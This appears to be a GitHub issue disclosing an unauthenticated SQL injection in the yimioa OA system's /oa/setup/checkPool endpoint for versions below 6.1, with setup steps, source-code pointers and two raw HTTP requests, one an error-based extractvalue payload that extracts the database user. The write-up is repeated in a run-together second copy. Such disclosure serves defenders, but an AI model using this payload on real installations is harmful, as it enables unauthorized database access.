You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Direct one-click installation can be started, and then login on the account admin password 1111111, login if prompted authentication expired can not log in, change the local system time can
Download a good local idea to open a static look at the code on
[Frontend] <6.1 Version Unauthorized SQL Injection
Through the apikit interface fuzz found an interface that can be unauthorized requests, find the corresponding implementation method in the code
Prerequisite: this hole has a condition, that is, the need for less than 6.1 version, the specific why directly on the code src/main/java/com/cloudweb/oa/controller/ApplicationController.java
The above does not need to care, specifically note the following if(isValid)
First get the version from the configuration
Get to version 6.1, then start the version determination
Determine if it is less than 3
Determine if it is less than 4
Determine if it is less than 5
Determine if it is equal to 6
The condition to be used here is that the version needs to be <= 6 in order to be successful
So change the version
You also need to change one more location, you need to change the version of the database, otherwise the login will prompt the version is inconsistent, the database and configuration file version judgment class in src/main/java/com/cloudweb/oa/service/LoginService.java
Just change the value of the version field in the oa_sys_ver table in the database
Restart tomcat after the change, and then request the specified interface without logging in
POST /oa/setup/checkPool?database=test' HTTP/1.1Host: 172.16.140.186:8088User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0Accept: */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeContent-Length: 2
Found that the return here actually has a return, will prompt the SQL statement to report an error
Here we bring out the user directly with extractvalue POC
POST /oa/setup/checkPool?database=test'and+(extractvalue(1,concat(0x7e,(select+user()),0x7e)))--+ HTTP/1.1Host: 172.16.140.186:8088User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0Accept: */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeContent-Length: 2
The text was updated successfully, but these errors were encountered:
Environment construction
http://partner.yimihome.com/static/index.html#/index/sys_env
Direct one-click installation can be started, and then login on the account admin password 1111111, login if prompted authentication expired can not log in, change the local system time can
http://172.16.140.189:8088/oa/setup/license.jsp
Once installed here, the source code is available for download at gitee
https://gitee.com/bestfeng/yimioa
Download a good local idea to open a static look at the code on
[Frontend] <6.1 Version Unauthorized SQL Injection
Through the
apikit
interface fuzz found an interface that can be unauthorized requests, find the corresponding implementation method in the codePrerequisite: this hole has a condition, that is, the need for less than 6.1 version, the specific why directly on the code
src/main/java/com/cloudweb/oa/controller/ApplicationController.java
The above does not need to care, specifically note the following if(isValid)
First get the version from the configuration
Get to version 6.1, then start the version determination
Determine if it is less than 3
Determine if it is less than 4
Determine if it is less than 5
Determine if it is equal to 6
The condition to be used here is that the version needs to be <= 6 in order to be successful
So change the version
You also need to change one more location, you need to change the version of the database, otherwise the login will prompt the version is inconsistent, the database and configuration file version judgment class in
src/main/java/com/cloudweb/oa/service/LoginService.java
Just change the value of the version field in the oa_sys_ver table in the database
Restart tomcat after the change, and then request the specified interface without logging in
Found that the return here actually has a return, will prompt the SQL statement to report an error
Here we bring out the
user
directly withextractvalue
POC
HTTP
The text was updated successfully, but these errors were encountered: